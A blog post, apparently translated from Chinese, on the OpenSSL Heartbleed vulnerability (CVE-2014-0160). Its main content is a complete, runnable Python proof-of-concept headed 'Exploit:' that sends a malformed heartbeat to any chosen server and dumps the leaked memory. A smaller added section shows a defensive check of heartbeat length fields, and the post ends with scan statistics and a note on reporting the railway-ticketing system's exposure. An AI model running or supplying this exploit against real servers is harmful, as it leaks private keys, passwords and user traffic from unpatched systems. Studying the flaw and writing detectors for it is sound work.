  • OpenSSL "Heartbleed" security vulnerability

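    The official Heartbleed site has detailed information on CVE-2014-0160, a security issue caused by an information-disclosure vulnerability in OpenSSL. The Heartbleed bug lets anyone on the Internet read the memory of protected systems. This compromises the secret keys used to identify service providers and to encrypt traffic, users' names and passwords, and the actual content. The vulnerability allows attackers to eavesdrop on communications and, by impersonating service providers and users, to steal data directly from service providers.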

    The issue can currently be fixed by upgrading to OpenSSL 1.0.1g.

    Exploit:

    openssl.py

    #!/usr/bin/python

    # Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
    # The author disclaims copyright to this source code.

    import sys
    import struct
    import socket
    import time
    import select
    import re
    from optparse import OptionParser

    options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
    options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')

    def h2bin(x):
        return x.replace(' ', '').replace('\n', '').decode('hex')

    # Pre-built TLS 1.1 ClientHello record; the trailing extension
    # (00 0f 00 01 01) advertises heartbeat support.
    hello = h2bin('''
    16 03 02 00  dc 01 00 00 d8 03 02 53
    43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf
    bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00
    00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88
    00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c
    c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09
    c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44
    c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c
    c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11
    00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04
    03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19
    00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08
    00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13
    00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00
    00 0f 00 01 01
    ''')

    # Heartbeat record (content type 0x18) with record length 3: a request (01)
    # that claims a 0x4000-byte payload while carrying no payload at all.
    hb = h2bin('''
    18 03 02 00 03
    01 40 00
    ''')

    def hexdump(s):
        for b in xrange(0, len(s), 16):
            lin = [c for c in s[b : b + 16]]
            hxdat = ' '.join('%02X' % ord(c) for c in lin)
            pdat = ''.join((c if 32 <= ord(c) <= 126 else '.') for c in lin)
            print '  %04x: %-48s %s' % (b, hxdat, pdat)
        print

    def recvall(s, length, timeout=5):
        endtime = time.time() + timeout
        rdata = ''
        remain = length
        while remain > 0:
            rtime = endtime - time.time()
            if rtime < 0:
                return None
            r, w, e = select.select([s], [], [], 5)
            if s in r:
                data = s.recv(remain)
                # EOF?
                if not data:
                    return None
                rdata += data
                remain -= len(data)
        return rdata


    def recvmsg(s):
        # Read one TLS record: 5-byte header (type, version, length), then the payload.
        hdr = recvall(s, 5)
        if hdr is None:
            print 'Unexpected EOF receiving record header - server closed connection'
            return None, None, None
        typ, ver, ln = struct.unpack('>BHH', hdr)
        pay = recvall(s, ln, 10)
        if pay is None:
            print 'Unexpected EOF receiving record payload - server closed connection'
            return None, None, None
        print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))
        return typ, ver, pay

    def hit_hb(s):
        s.send(hb)
        while True:
            typ, ver, pay = recvmsg(s)
            if typ is None:
                print 'No heartbeat response received, server likely not vulnerable'
                return False

            # Record type 24 is a heartbeat response.
            if typ == 24:
                print 'Received heartbeat response:'
                hexdump(pay)
                if len(pay) > 3:
                    print 'WARNING: server returned more data than it should - server is vulnerable!'
                else:
                    print 'Server processed malformed heartbeat, but did not return any extra data.'
                return True

            # Record type 21 is a TLS alert.
            if typ == 21:
                print 'Received alert:'
                hexdump(pay)
                print 'Server returned error, likely not vulnerable'
                return False

    def main():
        opts, args = options.parse_args()
        if len(args) < 1:
            options.print_help()
            return

        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        print 'Connecting...'
        sys.stdout.flush()
        s.connect((args[0], opts.port))
        print 'Sending Client Hello...'
        sys.stdout.flush()
        s.send(hello)
        print 'Waiting for Server Hello...'
        sys.stdout.flush()
        while True:
            typ, ver, pay = recvmsg(s)
            if typ is None:
                print 'Server closed connection without sending Server Hello.'
                return
            # Look for server hello done message.
            if typ == 22 and ord(pay[0]) == 0x0E:
                break

        print 'Sending heartbeat request...'
        sys.stdout.flush()
        s.send(hb)
        hit_hb(s)

    if __name__ == '__main__':
        main()
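
    From the receiving side, the check that makes a request like `hb` harmless is the length rule in RFC 6520: a heartbeat whose claimed payload length does not fit inside the record that carried it must be discarded. The following is an added example (Python 3, not part of the original post or of OpenSSL) that applies that rule to plaintext heartbeat records in a captured byte stream; the function names and the second sample record are constructed for illustration.

```python
import struct

HEARTBEAT = 24       # TLS record content type 0x18
MIN_PADDING = 16     # RFC 6520 requires at least 16 bytes of padding

def parse_records(stream):
    """Yield (content_type, fragment) for each complete TLS record."""
    off = 0
    while off + 5 <= len(stream):
        ctype, _ver, length = struct.unpack('>BHH', stream[off:off + 5])
        frag = stream[off + 5:off + 5 + length]
        if len(frag) < length:       # truncated capture, stop parsing
            break
        yield ctype, frag
        off += 5 + length

def inspect_heartbeat(frag):
    """Return (verdict, claimed_len, room) for one plaintext heartbeat.

    room is how many payload bytes the record can really hold once the
    3-byte heartbeat header and the minimum padding are accounted for.
    """
    if len(frag) < 3:
        return ('truncated', None, 0)
    _hb_type, claimed = struct.unpack('>BH', frag[:3])
    room = max(0, len(frag) - 3 - MIN_PADDING)
    # The receiver must discard the message when the claimed payload
    # length does not fit inside the record that carried it.
    verdict = 'discard' if 3 + claimed + MIN_PADDING > len(frag) else 'ok'
    return (verdict, claimed, room)

def scan(stream):
    """Inspect every heartbeat record in a captured plaintext stream."""
    return [inspect_heartbeat(f)
            for t, f in parse_records(stream) if t == HEARTBEAT]

# Constructed sample capture: the 8-byte `hb` record from the script above,
# followed by a well-formed request (4-byte payload, 16 bytes of padding).
MALFORMED = bytes.fromhex('1803020003014000')
WELL_FORMED = bytes.fromhex('1803020017010004') + b'ping' + bytes(16)

if __name__ == '__main__':
    for verdict, claimed, room in scan(MALFORMED + WELL_FORMED):
        print('%-9s claimed=%s room=%d' % (verdict, claimed, room))
```

    The inspection only applies to heartbeats sent in the clear, as the script above does before any keys are negotiated; once records are encrypted the inner length field is not visible on the wire.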

    Statistics from ZoomEye: of 1601250 port-443 services nationwide, 33303 are affected by this OpenSSL vulnerability!

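    The vulnerability in the Ministry of Railways' 12306 system was reported first by 猪猪侠, so my submission was rejected. For details see: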

    http://wooyun.org/bugs/wooyun-2014-055939

  • Original article: https://www.cnblogs.com/im404/p/3653164.html